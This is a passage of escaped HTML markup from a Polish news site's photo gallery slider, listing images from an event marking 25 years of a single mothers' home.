https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item32\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32.jpg\" title=\"25 lat Domu Samotnej Matki (32)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item33\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33.jpg\" title=\"25 lat Domu Samotnej Matki (33)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item34\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34.jpg\" title=\"25 lat Domu Samotnej Matki (34)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item35\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35.jpg\" title=\"25 lat Domu Samotnej Matki (35)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item36\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36.jpg\" title=\"25 lat Domu Samotnej Matki (36)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item37\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37.jpg\" title=\"25 lat Domu Samotnej Matki (37)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item38\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38.jpg\" title=\"25 lat Domu Samotnej Matki (38)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item39\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39.jpg\" title=\"25 lat Domu Samotnej Matki (39)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item40\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40.jpg\" title=\"25 lat Domu Samotnej Matki (40)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item41\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41.jpg\" title=\"25 lat Domu Samotnej Matki (41)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item42\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42.jpg\" title=\"25 lat Domu Samotnej Matki (42)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item43\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43.jpg\" title=\"25 lat Domu Samotnej Matki (43)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item44\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44.jpg\" title=\"25 lat Domu Samotnej Matki (44)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item45\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45.jpg\" title=\"25 lat Domu Samotnej Matki (45)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item46\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46.jpg\" title=\"25 lat Domu Samotnej Matki (46)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item47\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47.jpg\" title=\"25 lat Domu Samotnej Matki (47)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item48\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-48.jpg\" title=\"25 lat Domu Samotnej Matki (48)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-48-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-48-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-48-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-48.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item49\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-49.jpg\" title=\"25 lat Domu Samotnej Matki (49)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-49-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-49-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-49-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-49.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item50\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50.jpg\" title=\"25 lat Domu Samotnej Matki (50)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item51\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51.jpg\" title=\"25 lat Domu Samotnej Matki (51)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item52\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-52.jpg\" title=\"25 lat Domu Samotnej Matki (52)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-52-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-52-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-52-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-52.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item53\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53.jpg\" title=\"25 lat Domu Samotnej Matki (53)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item54\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54.jpg\" title=\"25 lat Domu Samotnej Matki (54)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54-768x510.jpg 768w, 